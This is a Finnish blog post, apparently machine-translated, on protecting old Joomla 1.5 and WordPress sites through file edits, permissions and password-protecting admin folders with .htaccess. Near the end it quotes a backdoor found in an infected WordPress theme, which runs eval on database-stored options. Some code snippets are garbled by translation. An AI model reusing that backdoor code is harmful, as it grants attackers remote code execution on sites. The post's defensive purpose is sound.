Huomio! Jos unohdat yhtäkkiä uuden järjestelmänvalvojan kirjautumisosoitteen, sinun on poistettava tämä laajennus käytöstä. Tämä voidaan tehdä menemättä hallintapaneeliin, jos sinulla on pääsy sivuston kansioihin ja tiedostoihin. Sinun tarvitsee vain nimetä uudelleen tai poistaa laajennuskansio wps-hide-login, joka tulee olemaan kansiossa laajennuksia(laajennukset-kansio sijaitsee wp-content-kansiossa).

Seurauksena: kaikkien yllä olevien toimenpiteiden soveltamisen jälkeen meidän pitäisi saada järjestelmänvalvojan sisäänkirjautumissuojaus kolmella tuntemattomalla: Sähköposti / Käyttäjätunnus, monimutkainen salasana ja oma ainutlaatuinen kirjautumis-URL-osoite - ja tämä voi merkittävästi monimutkaistaa nuorten hakkerien ponnisteluja)

Hei, rakkaat blogisivuston lukijat. Tänään haluan puhua työturvallisuudesta ja joistakin tavoista suojata verkkosivustoa hakkeroinnilta. Valitettavasti en ole asiantuntija tällä alalla, enkä tietämykseni ylitä artikkelin laajuutta, mutta kuvailen vain viimeaikaista kokemustani. En käyttänyt mitään monimutkaista, mutta toivon, että tämä lisää sivustoni kanssa työskentelyn turvallisuutta.

Se on noin kaksinkertainen todennus kirjautuaksesi moottorin hallintapaneeliin verkkosivustosi (pitäisi toimia missä tahansa sisällönhallintajärjestelmässä, mutta henkilökohtaisesti testasin sitä vain WordPressissä ja Joomlassa). Suojaus on asennettu palvelintasolle, joten kaikki yritykset arvata hallintapaneelin salasana (raaka voima) eivät lisää isännöinnille aiheutuvaa kuormitusta ja sen ohittaminen on melko vaikeaa. Se on helppo asentaa (kirjaimellisesti muutamassa vaiheessa) ja kaikesta tiedosta se vaatii vain tarkkaavaisuutta ja kykyä päästä sivustolle FTP:n kautta.

No, annan myös muutaman toimenpiteen, joita tein jo vanhentuneiden Joomla 1.5 -moottorien sivustoille, joihin minun ei ole järkeä siirtää, mutta jotka rikkovat jatkuvasti palvelintani ja käyttävät palvelinta roskapostin lähettämiseen. Tein kuvatut toimet äskettäin, joten en voi sanoa, että sivustot ovat lakanneet olemasta viruksia, mutta toivon niin. Yleisesti ottaen yritin vähän lisää Joomla 1.5:n halkeamiskestävyyttä.

Kuinka suojata Joomla 1.5 hakkeroilta ja viruksilta

Kuten edellä mainitsin, ongelmana on, että kahta Joomla 1.5:tä käyttävää sivustoani hakkeroidaan jatkuvasti. Voimme pitää niitä hylätyinä, koska en lisää niihin uusia materiaaleja, mutta ne tuottavat säännöllisesti tuloja (Miralinksin ja Webartexin artikkeleiden julkaisemisesta sekä Gogetlinksin linkeistä). Yleensä on sääli heittää ne pois, ja niiden siirtäminen uuteen moottoriversioon on tuhlausta (ajan ja vaivan hukkaa).

Jäljelle jää vain joko jatkuvasti valvoa palvelimen kuormitusta ja sen kasvaessa etsiä konetiedostojen joukosta kuorita ja muita haittaohjelmia tai jotenkin vahvistaa suojausta. Haittaohjelmien etsimiseksi lataan moottoritiedostot tietokoneelleni ja skannaan ne DoctorWebillä ja Aibolitilla. Edellinen ei löydä kaikkea, ja jälkimmäinen näkee vihollisen liian usein siellä, missä sitä ei ole, mutta en tiedä muita tehokkaita menetelmiä. Vaikka ohjelmia on myös kymmeniä, mutta tämä on kätevämpää kaikille.

Muuten, käsikirjoitus Aibolit voi toimia paitsi palvelimella myös suoraan tietokoneella kansiossa, jossa on ladatut moottoritiedostot (älä vain unohda poistaa tavallista virustorjuntaa sivustoa ladattaessa, koska se voi poistaa osan tiedostoista, mutta ne silti jää palvelimelle).

Yksityiskohtaiset ohjeet annetaan alla olevassa videossa, mutta lyhyesti sanottuna lataat PHP-kielitulkin Microsoftin verkkosivustolta ja asennat sen. Tämän jälkeen avaat Aibolit-skriptitiedoston nimeltä ai-bolit.php käyttämällä tätä tulkintaa:

Skannausnopeus riippuu tietokoneesi nopeudesta ja verkkosivustosi moottorissa olevien tiedostojen määrästä. Kesti useita tunteja https://sivustolle, koska Aibolit epäilee jopa kuvia kätkeytyvistä viruksista, ja minulla on paljon näitä kuvia, ja välimuistitiedostot vievät paljon aikaa skannattaessa. Joomla 1.5 -sivustoilla vahvistus oli paljon nopeampi.

Päätin viettää päivän etsiessäni tapoja parantaa verkkosivustojen turvallisuutta. Onnistuimme tekemään hyvin vähän, mutta silti parempi kuin ei mitään. Aloitetaan kahden Joomla 1.5 -sivuston suojauksen vahvistaminen (ja haavoittuvuuksien vähentäminen).. Tehtiin seuraavaa:

Kuinka muuten suojata Joomla 1.5 viruksilta ja suoratoistohakkeroilta

1. Lisäksi "asiantuntijat" väittävät, että Joomla 1.5 -sivustot rikotaan "yhden tai kaksi kertaa" käyttämällä moottorissa saatavilla olevaa (oletettavasti voit vaihtaa järjestelmänvalvojan salasanan sen kautta). Vaikka et käyttäisikään rekisteröintiä verkkosivustollasi etkä näytä palautuslinkkiä missään, tämä ei tarkoita, että olet peittänyt tämän haavoittuvuuden. Lisää vain seuraava katkelma sivustosi etusivun URL-osoitteeseen ja saat etsimäsi ominaisuuden: /index.php?option=com_user&view=reset

   Itse asiassa voit sulkea tämän porsaanreiän (mutta en silti ymmärrä kuinka käyttää sitä hakkerointiin) poistamalla seuraavan tiedoston:

   /components/com_user/models/reset.php Totta, tämän jälkeen kukaan sivustollesi rekisteröityneistä käyttäjistä ei voi käyttää salasanan palautustoimintoa, mutta minulle tämä ei ollut tärkeää, koska rekisteröintiä ei annettu.

2. He myös sanovat, että tällainen hyödyllinen temppu, kuten sivun osoitteen lisääminen, mahdollistaa myös virusten kirjoittajien ja muiden ihmisten omaisuuden metsästäjien pääsyn sivustosi herkille alueille ja tehdä siitä tuhoisaa tai jollain muulla tavalla liioitella häntä. Tämä asia poistetaan jälleen muokkaamalla yhtä moottoritiedostoista. /libraries/Joomla/application/module/helper.php

   Siellä sinun on poistettava kaksi koodinpätkää tai kommentoitava ne ja suljettava ne /* ja */ (kielen tulkki ei suorita tätä koodia). Ensimmäinen fragmentti on tällainen:

   If(count($tulos) == 0) ( if(JRequest::getBool("tp")) ( $tulos = JModuleHelper::getModule("mod_".$position); $tulos->otsikko = $sijainti; $tulos->sisältö = $sijainti; $tulos->sijainti = $sijainti; ) )

   Ja toinen on tällainen:

   If(JRequest::getBool("tp")) ( $attribs["style"] .= " outline"; )

   Itse asiassa tämän jälkeen nollaat välimuistin ja yrität tarkastella moduulien paikkoja mallissasi käyttämällä tätä rakennetta:

   https://site/?tp=1

   Jos se ei toiminut, toivottavasti olet sulkenut tämän reiän.

3. Hyvin usein sivustoja hakkeroidaan ei ulkopuolelta, vaan sisältä. Tietokoneesi troijalaiset ja keygens tietävät mitä ja mistä etsiä, joten älä tallenna salasanoja FTP-asiakkaille(Tähän tarkoitukseen on olemassa vaihtoehto.) Vielä siistimpää on estää pääsy sivustollesi FTP:n kautta, ja sen sijaan lähetetyt tiedot (mukaan lukien salasanat) salataan, jolloin niiden sieppaaminen on turhaa. Rehellisesti sanottuna jätän viimeiset neuvot huomiotta "pimeydeni" takia. On myös mahdollisuus määrittää pääsy sivustollesi tavallisen FTP:n kautta vain tietystä IP-osoitteesta (tietokoneeltasi), mutta Internet-palveluntarjoajallani on dynaaminen IP-osoite (muutoksia tietyllä alueella).
4. Myös neuvoa moottori ei korkeampi kuin sen toiminnan todellisuudessa vaaditaan. Itse asiassa, ajattelematta sitä, asetin sen mallin mukaan: 755 kansioille ja 644 tiedostoille. Voit tehdä kaiken samalla Filezilalla. Lisäksi näitä oikeuksia tulee soveltaa paitsi juurikansion hakemistoihin, myös kaikkiin niiden sisällä oleviin hakemistoihin ja tiedostoihin.

   

   Asetin juurikansion tiedostoille oikeudet 444 ja tmp- ja lokihakemistoille 705. Tietysti olisin voinut kiristää sen tiukemminkin, mutta minulla ei ole tästä paljoa kokemusta, eikä aikaakaan ollut. tuhlata aikaa kokeiluihin. Ja lisäksi kaikki tämä ei estä hakkereita vakavasti, koska on asioita, jotka voivat mitätöidä kaikki ponnistelumme. Voit tehdä tämän käyttämällä seuraavanlaisia ​​komentoja:

   Siksi, jotta Joomla 1.5 -moottorin tiedostot voidaan "konkreetoida" kokonaan hakkerointia ja tunkeutumista vastaan, on välttämätöntä kieltää tiedostojen ja kansioiden käyttöoikeuksien muuttaminen PHP:n kautta. Tämä tehdään palvelinasetuksissa, mutta en vielä tiedä miten ja missä. Jos tiedät, laita linkki.

5. Kaikki edellä mainitut toimet on suunniteltu vähentämään todennäköisyyttä, että sivustosi hakkeroidaan ja että kuoret ja muut haittaohjelmat pääsevät siihen. Noudatetut varotoimet eivät kuitenkaan ole tae, joten se olisi hienoa palvelimella (jossa Joomla 1.5 -sivustosi sijaitsee). Tämä poistaa kaiken negatiivisuuden vuotaneesta pahasta. Henkilökohtaisesti en kuitenkaan ole vielä toteuttanut tätä "pimeydeni" syistä. Olisin kiitollinen linkeistä materiaaleihin, jotka selittävät tämän prosessin.

Hyvin usein verkkosivustot rikkoutuvat hallintapaneelin käytön jälkeen. On selvää, että se on suojattu salasanalla, joten raa'alla voimalla (älykäs valinta) murretaan monet, jopa monimutkaiselta vaikuttavat salasanat yhdellä tai kahdella. Siksi myös hallintapaneeli on suojattava, ja on parempi tehdä tämä ei käyttämällä lisälaajennuksia, vaan käyttämällä palvelintyökaluja. Suojausvaihtoehtoja on useita. Voit esimerkiksi muuttaa hallintapaneelin URL-osoitetta tavalla tai toisella, jotta hakkeri ei voi aloittaa likaista liiketoimintaansa.

Toinen suojausmenetelmä, jota kuvataan yksityiskohtaisesti alla, on luoda lisäeste hyökkääjän (elävän henkilön tai käsikirjoituksen) tielle. Se koostuu hakemiston salasanasuojauksesta admin-tiedostoilla (Joomlassa tämä on järjestelmänvalvojan kansio ja WordPressissä - wp-admin) verkkopalvelimen avulla. Osoittautuu, että kun käytät hallintapaneelia, sinun on ensin syötettävä kirjautumistunnus ja salasana päästäksesi kansioon, ja vasta sitten kirjautumistunnus ja salasana päästäksesi itse asiassa moottorin hallintapaneeliin. Lisäksi murtamalla ensimmäisen puolustuslinjan raa'alla voimalla, haittaohjelma ei aiheuta merkittävää lisäkuormitusta palvelimelle, mikä on hyvä asia.

6. Toinen mielestäni erittäin tärkeä huomautus sivustojesi turvallisuuden lisäämiseksi hakkeroinnilta ja virustartunnalta on säännön noudattaminen: yksi sivusto - yksi hosting-tili. Kyllä, se on kalliimpaa, mutta paljon turvallisempaa. Yhdellä tilillä isännöitynä kaikki sivustosi ovat välittömästi käytettävissä FTP:n kautta, jos haittaohjelma pääsee vain yhteen niistä. Ne rikkovat sivustoja automaattisesti, eikä olisi järkevää toivoa, että skriptit eivät nouse hakemistopuuhun. Lisäksi on erittäin vaikeaa käsitellä joukkoa sivustoja yhdellä isännöintitilillä, koska työskentelemällä yhdellä sivustolla unohdat näkyvistä jo parantuneen, joka tarttuu samanaikaisesti.
7. Muuten, he voivat murtautua paitsi omalta sivustoltasi, myös isännöintinaapurisi sivustolta, jos omistajat eivät ole huolehtineet asianmukaisesti sulkeakseen tämän mahdollisuuden pois. Isännöintipaneeli (kuten) voidaan myös hakkeroida, mutta joka tapauksessa isännöitsijän virheestä johtuvien hakkerointien määrä on mitätön verrattuna sivuston omistajien huolimattomuudesta johtuviin hakkereihin.

Kuinka suojata verkkosivustosi hallinta-alue hakkerointia vastaan?

Haluan puhua yksityiskohtaisesti suojausmenetelmästä, jota käytin äskettäin itse. Se koostuu estää pääsyn kansioihin, joissa sivuston hallintapaneelitiedostot sijaitsevat. Kielto asetetaan upealla .htaccess-tiedostolla, jonka avulla voit pohjimmiltaan hallita etäältä sen web-palvelimen asetuksia, johon sivustosi on asennettu. Samalla hän osaa tehdä tämän valikoivasti.

Kaikki .htaccess-tiedostoon kirjoitetut käskyt koskevat vain sitä hakemistoa, jossa se sijaitsee. Haluatko muuttaa jotain koko sivuston asetuksissa? Aseta sitten .htaccess juurikansioon. No, olemme kiinnostuneita vain admin-tiedostojen kansion asetuksista, joten sijoitamme sen sinne. Joomlassa tämä on järjestelmänvalvojan kansio, WordPressissä - wp-admin.

Emme kuitenkaan tule toimeen pelkällä .htaccessilla. Sinun on myös käytettävä .htpasswd-tiedostoa, johon tallennetaan tämän järjestelmänvalvojan kansion kirjautumistunnus ja salasana. Lisäksi salasanaa ei tallenneta selkeänä tekstinä, vaan MD5-salauksena. Salasanaa ei voida palauttaa sen avulla, mutta kun syötät oikean yhdistelmän salasanakenttään, verkkopalvelin laskee MD5-summan tälle yhdistelmälle ja vertaa sitä .htpasswd-tiedostoon tallennettuun. Jos tiedot täsmäävät, sinut päästetään Joomlan tai WordPressin hallinta-alueelle, mutta jos ei, sinua ei sallita.

Siinä kaikki, jäljellä on vain toteuttaa suunnitelma. Sinun on lisättävä joitakin ohjeita .htaccess-tiedostoon. Tiedätkö mitkä? Minä en tiedä. Ja jotenkin sinun on muutettava salasana MD5-sekvenssiksi. Ongelma. Sillä on kuitenkin melko yksinkertainen ratkaisu. Hyvät ihmiset ovat järjestäneet verkkopalvelun sisällön tuottamiseksi .htaccess- ja .htpasswd-tiedostoille luomasi käyttäjätunnuksen ja salasanan perusteella. Totta, sinun on myös määritettävä absoluuttinen polku hallintakansioon, mutta tämä on triviaalia.

Joten tapaa suuri ja kauhea suojausgeneraattori sivustosi hallintapaneelille. Näen, eikö? Keksit tai mikä parasta, luot johonkin kaksi monimutkaista kirjainten, numeroiden ja symbolien yhdistelmää, minkä jälkeen kirjoitat ne kahteen ylimpään kenttään. Älä vain unohda kirjoittaa niitä muistiin tai laittaa ne salasanojen hallintaan, muuten et voi kirjautua järjestelmänvalvoja-alueelle ja joudut tekemään kaiken tässä osassa kuvatun alusta.

Tässä nyt. Tiedätkö tämän? Vaikka et tietäisi, sillä ei ole väliä. Yhdistä sivustoon FTP:n kautta, luo tiedosto sen juureen millä tahansa nimellä (jopa seuraavalla url_path.php) ja lisää siihen tämä yksinkertainen koodi:

"; echo "Komentosarjan koko polku ja sen nimi: ".$_SERVER["SCRIPT_FILENAME"]."
"; echo "Skriptin nimi: ".$_SERVER["SCRIPT_NAME"]; ?>

Siirry sitten selaimeen ja kirjoita tämä URL-osoite osoitepalkkiin (tietenkin verkkotunnuksesi kanssa):

Https://site/url_path.php

Tämän seurauksena näet ehdottoman polun, josta olet kiinnostunut. Kirjoita se yllä olevaan .htaccess- ja .htpasswd-tiedostogeneraattoriin. Älä unohda lisätä järjestelmänvalvojan tai wp-admin-kansion nimeä tämän polun loppuun ilman kauttaviivaa. Siinä kaikki, napsauta nyt "Luo" -painiketta

Siirrä .htaccess- ja .htpasswd-tiedostojen sisältö yksitellen suoraan näihin samoihin tiedostoihin.

Toivon, että olet jo luonut ne järjestelmänvalvojan tai wp-admin-kansioon (käytettävästä moottorista riippuen)?

Yritä nyt kirjautua hallintapaneeliin. Näkyviin tulee ikkuna, jossa sinua pyydetään antamaan verkkopalvelimesi käyttäjätunnus ja salasana? Se hahmonnetaan eri tavalla eri selaimissa, mutta Chromessa se näyttää tältä:

Jos jokin ei toimi, "savuta" absoluuttinen polku .htpasswd-tiedostoon, joka on kirjoitettu .htaccess-tiedostoon. Tässä tapauksessa korjaa se manuaalisesti, kun muokkaat tiedostoa. Siinä kaikki, mitä halusin kertoa sinulle tänään. Jos haluat kritisoida tai lisätä jotain, mene eteenpäin.

Virus WordPressissä?

Tämän artikkelin kirjoittamisen jälkeen löysin haittaohjelmia blogistani (https://site) (tai jostain, joka asennettiin tahtoni ohittaen). Halusin vain muuttaa jotain koodissa ja menin . Aivan alareunassa, juuri ennen Body-tagia, minuun iski kutsu johonkin minulle tuntemattomaan funktioon (sen nimen perusteella, mutta en löytänyt mitään hyödyllistä):

Nimi näyttää järkevältä. On huomionarvoista, että noin kolme viikkoa aiemmin huomasin vahingossa, että minulla on uusi taulukko kahden WordPress-blogini tietokannassa (https://site ja toinen). Sen nimi oli yksinkertaisesti upea - wp-config. Tämän nimen googlettaminen uudelleen ei tuottanut mitään hyödyllistä, koska kaikki vastaukset liittyivät samannimiseen wp-config.php-tiedostoon.

Tämä taulukko kasvoi nopeasti (jopa sata megatavua https://sivustolla) ja siihen kirjoitettiin sivustoni sivujen osoitteet erilaisilla parametreilla. Ymmärtämättä tämän prosessin ydintä, yksinkertaisesti purin tämän pöydän ja se on siinä. Muuten, minulla on toinen blogi WordPressissä, mutta siellä ei havaittu mitään vastaavaa.

No, täältä löysin tällaisen "puhuvan" lisäyksen aiheeseen. Päätin katsoa, ​​oliko sinne lisätty jotain, joka on sopusoinnussa alatunnisteen alareunassa olevan rivin kanssa. Kävi ilmi, että se lisättiin. Ja niin siististi - ei ylhäällä eikä alareunassa, vaan toinen (tai kolmas) toiminto ylhäältä kirjoitettuna:

Funktio wp_custom_page_links_return() ( $option = get_option("wp_custom_page_links"); @eval($option); ) @eval(get_option("wp_brlinks"));

Tässä upea "eval" pistää katseesi. Huomionarvoista on, että Aibolit (kuvattu yllä) piti tätä fragmenttia epäilyttävänä, mutta en ole vielä perehtynyt siihen, koska tämä käsikirjoitus epäilee jo monia ihmisiä epäluotettavuudesta. Googlasin myös tästä koodista ja löysin viestin (valitettavasti tuo verkkotunnus oli nyt estetty maksamatta jättämisen vuoksi), jossa kuvataan samanlainen ongelma. Ystäväni vuoti tämän paskan uudella teemalla, johon oli upotettu asennuskoodia.

Minulla on ollut aiheita molemmissa tartunnan saaneissa blogeissa monta vuotta. Moottorissa tai :ssä oli luultavasti jonkinlainen haavoittuvuus, jota pahat tahot käyttivät nopeasti (streamissä) hyväkseen. Yleisesti ottaen tarkista itsesi tällaisten sulkeumien varalta. Kuvattujen tiedostojen muokkauspäivä oli mielestäni tämän vuoden syyskuun puoliväli.

Suosittelen myös tutustumaan valikoimaan 17 videotuntia Joomlan verkkosivustojen turvaamisesta. Ne toistetaan automaattisesti peräkkäin, ja voit halutessasi siirtyä seuraavalle oppitunnille käyttämällä vastaavaa painiketta soitinpaneelissa tai valita haluamasi oppitunnin soitinikkunan vasemmassa yläkulmassa olevasta pudotusvalikosta:

Nauti katsomisesta!

Onnea sinulle! Nähdään pian blogisivuston sivuilla

Saatat olla kiinnostunut

Joomla-sivusto alkoi tuottaa joukon virheitä, kuten - Tiukat standardit: Ei-staattinen menetelmä JLoader::import () ei tule kutsua staattisesti
Päivitetään Joomla uusimpaan versioon
Kartan luominen Joomla-sivustolle Xmap-komponentilla
Mikä on Joomla
Käyttäjäryhmät Joomlassa, välimuistiasetukset ja sähköpostin lähettämisen ongelma sivustolta
K2-komponentti blogien, luetteloiden ja portaalien luomiseen Joomlassa - ominaisuudet, asennus ja venäläistäminen
Moduulit Joomlassa - katselupaikka, asetus ja lähtö sekä luokkaliitteiden määrittäminen
Staattisen HTML-sivuston päivittäminen dynaamiseen Joomlassa
WordPressin asennus yksityiskohdissa ja kuvissa, kirjautuminen WP:n admin-alueelle ja salasanan vaihto
Joomla-laajennukset - TinyMCE, Load Module, Legacy ja muut oletuksena asennettuna